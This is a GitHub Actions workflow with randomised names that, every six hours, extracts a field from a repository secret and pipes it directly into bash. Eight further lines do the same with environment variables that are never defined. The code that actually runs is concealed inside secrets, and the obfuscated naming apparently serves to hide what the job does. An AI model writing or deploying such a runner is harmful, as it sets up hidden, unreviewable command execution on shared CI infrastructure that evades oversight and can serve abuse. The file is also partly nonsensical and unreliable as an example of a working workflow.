name: midwifeprosecutor

on:
  workflow_dispatch:
  schedule:
    - cron: '4 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: midwifeprosecutor
        env:
          dx572: ${{ secrets.dx572 }}
        run: |
          echo $dx572 | jq -r .nz872 | /bin/bash
          echo $c55 | jq -r .kmm7 | /bin/bash
          echo $pfnnp0 | jq -r .ox551 | /bin/bash
          echo $cqu6198 | jq -r .oqxha2790 | /bin/bash
          echo $mqrm80780 | jq -r .ok39602 | /bin/bash
          echo $s0 | jq -r .bq7 | /bin/bash
          echo $ncry3173 | jq -r .cq01671 | /bin/bash
          echo $kwvi9 | jq -r .rj6 | /bin/bash
          echo $kt0647 | jq -r .hymqu9101 | /bin/bash

